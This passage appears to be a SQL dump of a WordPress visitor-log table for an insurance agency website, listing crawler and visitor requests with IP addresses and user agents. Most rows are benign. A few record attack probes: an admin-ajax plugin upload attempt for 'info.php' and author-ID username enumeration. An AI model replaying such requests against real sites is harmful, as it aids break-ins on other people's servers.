bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16353,'0b_48a75b3b7678fdfd612e3c8a0a2ebd47','1460423247','69.30.221.250','latestdirect.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(16355,'0b_bdb62ffefb20426956a288902ab3ebb0','1460423247','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16356,'0b_bdb62ffefb20426956a288902ab3ebb0','1460423249','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16358,'0b_bdb62ffefb20426956a288902ab3ebb0','1460423255','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16361,'0b_48a75b3b7678fdfd612e3c8a0a2ebd47','1460423258','69.30.221.250','latestdirect.com','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(16362,'0b_48a75b3b7678fdfd612e3c8a0a2ebd47','1460423263','69.30.221.250','latestdirect.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(16364,'0b_6408efa349dd06891b8cac74b42967b1','1460423443','94.154.239.69','ip-ef45.d-net.kiev.ua','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','0','0',0),(16365,'0b_6408efa349dd06891b8cac74b42967b1','1460423445','94.154.239.69','ip-ef45.d-net.kiev.ua','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','0','0',0),(16368,'0b_7cd6baf0670ab8bdc0d05bce66351a08','1460424183','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16371,'0b_3319185d18d6fb278d72284546fbdcd2','1460425984','207.46.13.164','msnbot-207-46-13-164.search.msn.com','[404] /pdf/bankers_companies_ok_to_convert_from.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16374,'0b_22a61367aa632699163cdc2ad0592301','1460426090','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16377,'0b_f9b8a4f03f2eac264c70621ad6ffc102','1460431888','173.208.136.114','173.208.136.114','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(16380,'0b_ff980ee148b7f67eec1561d72eb545e2','1460431920','66.249.83.133,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(16382,'0b_8ba498940be79d0bd6399972aa298437','1460431921','66.249.83.150,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(16385,'0b_e0c289069c051fb4a4c4c4a60d3fd736','1460433260','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16386,'0b_84c07faed5bbf797901e336c1f173b18','1460434378','5.9.98.130','static.130.98.9.5.clients.your-server.de','/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16388,'0b_84c07faed5bbf797901e336c1f173b18','1460434382','5.9.98.130','static.130.98.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16391,'0b_84c07faed5bbf797901e336c1f173b18','1460434384','5.9.98.130','static.130.98.9.5.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16394,'0b_84c07faed5bbf797901e336c1f173b18','1460434386','5.9.98.130','static.130.98.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16397,'0b_84c07faed5bbf797901e336c1f173b18','1460434389','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16398,'0b_84c07faed5bbf797901e336c1f173b18','1460434391','5.9.98.130','static.130.98.9.5.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16401,'0b_84c07faed5bbf797901e336c1f173b18','1460434393','5.9.98.130','static.130.98.9.5.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16403,'0b_84c07faed5bbf797901e336c1f173b18','1460434395','5.9.98.130','static.130.98.9.5.clients.your-server.de','/carriers/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16404,'0b_84c07faed5bbf797901e336c1f173b18','1460434397','5.9.98.130','static.130.98.9.5.clients.your-server.de','/contact/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16406,'0b_84c07faed5bbf797901e336c1f173b18','1460434399','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-status/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16407,'0b_84c07faed5bbf797901e336c1f173b18','1460434401','5.9.98.130','static.130.98.9.5.clients.your-server.de','/forms/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16410,'0b_84c07faed5bbf797901e336c1f173b18','1460434407','5.9.98.130','static.130.98.9.5.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16413,'0b_84c07faed5bbf797901e336c1f173b18','1460434409','5.9.98.130','static.130.98.9.5.clients.your-server.de','/term-quotes/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16416,'0b_84c07faed5bbf797901e336c1f173b18','1460434411','5.9.98.130','static.130.98.9.5.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16419,'0b_84c07faed5bbf797901e336c1f173b18','1460434413','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16422,'0b_84c07faed5bbf797901e336c1f173b18','1460434415','5.9.98.130','static.130.98.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16425,'0b_84c07faed5bbf797901e336c1f173b18','1460434417','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16428,'0b_84c07faed5bbf797901e336c1f173b18','1460434420','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16430,'0b_84c07faed5bbf797901e336c1f173b18','1460434422','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16431,'0b_84c07faed5bbf797901e336c1f173b18','1460434425','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16434,'0b_84c07faed5bbf797901e336c1f173b18','1460434427','5.9.98.130','static.130.98.9.5.clients.your-server.de','/members/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16436,'0b_84c07faed5bbf797901e336c1f173b18','1460434429','5.9.98.130','static.130.98.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(16437,'0b_919e6e88505ea4c02cdb9bc140b7d8ab','1460436054','144.76.30.236','thoreau.tk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','3','0',0),(16440,'0b_919e6e88505ea4c02cdb9bc140b7d8ab','1460436056','144.76.30.236','thoreau.tk','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','3','0',0),(16443,'0b_919e6e88505ea4c02cdb9bc140b7d8ab','1460436059','144.76.30.236','thoreau.tk','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','3','0',0),(16446,'0b_919e6e88505ea4c02cdb9bc140b7d8ab','1460436061','144.76.30.236','thoreau.tk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','3','0',0),(16448,'0b_6afb6abad1b256fcfbda006122a3600c','1460444066','66.249.66.24','crawl-66-249-66-24.googlebot.com','/licensing-contracting/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16449,'0b_b26d4962e26980d9b8e2663f5c5538aa','1460444177','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(16451,'0b_b26d4962e26980d9b8e2663f5c5538aa','1460444180','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(16452,'0b_b26d4962e26980d9b8e2663f5c5538aa','1460444182','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=info.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','','','','','3','0',0),(16454,'0b_b26d4962e26980d9b8e2663f5c5538aa','1460444183','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','','','','','3','0',0),(16457,'0b_edba8a056bce6f906d7e76814cbe9cb8','1460446293','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/sso/235_19.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16458,'0b_657c77c9def1afcc0a5b40d00b16373b','1460448408','66.249.66.24','crawl-66-249-66-24.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16461,'0b_27d787acf6e92df9ac7c61391dc5dbc6','1460449256','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16463,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452037','5.9.111.70','static.70.111.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16464,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452040','5.9.111.70','static.70.111.9.5.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16466,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452041','5.9.111.70','static.70.111.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16467,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452043','5.9.111.70','static.70.111.9.5.clients.your-server.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16470,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452045','5.9.111.70','static.70.111.9.5.clients.your-server.de','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16473,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452049','5.9.111.70','static.70.111.9.5.clients.your-server.de','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16475,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452054','5.9.111.70','static.70.111.9.5.clients.your-server.de','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16478,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452058','5.9.111.70','static.70.111.9.5.clients.your-server.de','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16481,'0b_9eeda7bca3dd7c8a3a92193061509490','1460452060','5.9.111.70','static.70.111.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(16484,'0b_7756f7ee03c20876510261a9445c377a','1460454428','173.255.243.26','li253-26.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(16485,'0b_5b6ae5a6084e684328586ebc1d115df3','1460457280','176.9.124.8','static.8.124.9.176.clients.your-server.de','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','','',0,'Linux','Chrome 28','de','','','','','','','0','0',0),(16487,'0b_48f8c176176648b3b00924ae24adb1d8','1460460436','180.76.15.9','baiduspider-180-76-15-9.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(16490,'0b_b1e9e1a33d4bec273b27ccb7b3641fce','1460460945','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16493,'0b_264c690f15fa40fa34ab136f3c8faffa','1460460953','199.30.25.76','msnbot-199-30-25-76.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(16496,'0b_761afacf755086d18e74d1d0b30c5b8a','1460461085','62.210.162.37','62-210-162-37.rev.poneytelecom.eu','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(16497,'0b_761afacf755086d18e74d1d0b30c5b8a','1460461086','62.210.162.37','62-210-162-37.rev.poneytelecom.eu','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(16500,'0b_761afacf755086d18e74d1d0b30c5b8a','1460461088','62.210.162.37','62-210-162-37.rev.poneytelecom.eu','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(16503,'0b_4313ba831cb5dfa6331280cf6a170c21','1460461556','78.149.122.151','host-78-149-122-151.as13285.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(16505,'0b_4313ba831cb5dfa6331280cf6a170c21','1460461558','78.149.122.151','host-78-149-122-151.as13285.net','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(16506,'0b_385a872a88ed46352c60390ab13c5bf5','1460461586','62.24.252.133','host-62-24-252-133.as13285.net','/meet-the-eib-team/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/meet-the-eib-team/','',0,'WinXP','IE 8','','','','','','','','0','0',0),(16508,'0b_385a872a88ed46352c60390ab13c5bf5','1460461601','62.24.252.133','host-62-24-252-133.as13285.net','/contact/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/contact/','',0,'WinXP','IE 8','','','','','','','','0','0',0),(16511,'0b_de3d2a3dd19d5c9a5c195eaf7d888712','1460462989','195.211.195.197','195.211.195.197','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16514,'0b_e52a285cafccb55f7fc3d4b64937e4b4','1460463367','108.74.21.175','108-74-21-175.lightspeed.wepbfl.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 49','us','1280 x 800','Google','','','','','0','0',0),(16515,'0b_e52a285cafccb55f7fc3d4b64937e4b4','1460463371','108.74.21.175','108-74-21-175.lightspeed.wepbfl.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','1280 x 800','','','','','','0','0',0),(16517,'0b_f7769a12dd3cece325b545f053d0be89','1460463951','178.184.216.57','57-216-184-178.pppoe.irtel.ru','/','','','',0,'','','ru','','','Unknown Spider','','','','0','0',0),(16518,'0b_1a7675173e8d116105913d958d8f624c','1460465507','157.55.39.176','msnbot-157-55-39-176.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16520,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460466569','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(16523,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460466570','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(16526,'0b_c84fcac4a323f42ac841b677e9bb0246','1460469007','180.76.15.143','baiduspider-180-76-15-143.crawl.baidu.com','/licensing-contracting/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(16529,'0b_86ba44ae7902dbc44e71b0313b5d8dfe','1460469641','54.87.72.22','ec2-54-87-72-22.compute-1.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)','','',0,'','','','','','linkdexbot','','','','0','0',0),(16530,'0b_86ba44ae7902dbc44e71b0313b5d8dfe','1460469641','54.87.72.22','ec2-54-87-72-22.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)','','',0,'','','','','','linkdexbot','','','','0','0',0),(16532,'0b_390303d969944b0471f019843baf3e34','1460470119','123.125.71.92','baiduspider-123-125-71-92.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(16533,'0b_34b541b57311a00cf85283a78c270d19','1460470177','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://127.0.0.1:2372/blockpage?id=4426','',0,'Win7','IE 11','us','','','','','','','0','0',0),(16535,'0b_34b541b57311a00cf85283a78c270d19','1460470181','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','','','','','','','0','0',0),(16536,'0b_b0d3dc11556efa6c8b5b0cbb3bcac080','1460471009','180.76.15.156','baiduspider-180-76-15-156.crawl.baidu.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(16539,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460471229','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16541,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460471231','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16542,'0b_b0e4a0462c4d951562e5a218cb53343f','1460471232','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16544,'0b_b0e4a0462c4d951562e5a218cb53343f','1460471233','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16545,'0b_ea5e364e253647dc13592ac11d8b32a5','1460471682','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16548,'0b_ea5e364e253647dc13592ac11d8b32a5','1460471693','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16551,'0b_ea5e364e253647dc13592ac11d8b32a5','1460471705','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16553,'0b_3cfbc7d46a2f6d8687971f4652f00bf0','1460472010','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16556,'0b_708050e24e60660b91d3b22e2b21516e','1460472275','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1366 x 768','','','','','','0','0',0),(16557,'0b_708050e24e60660b91d3b22e2b21516e','1460472276','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1366 x 768','','','','','','0','0',0),(16560,'0b_a3bd793051ab95c8320f1b778553211f','1460472395','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16562,'0b_a3bd793051ab95c8320f1b778553211f','1460472405','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16565,'0b_a3bd793051ab95c8320f1b778553211f','1460472415','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16568,'0b_e17ce635f56fc092657d19e76d14c731','1460473268','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(16569,'0b_e17ce635f56fc092657d19e76d14c731','1460473271','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(16572,'0b_e17ce635f56fc092657d19e76d14c731','1460473275','67.212.162.98','scan03.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 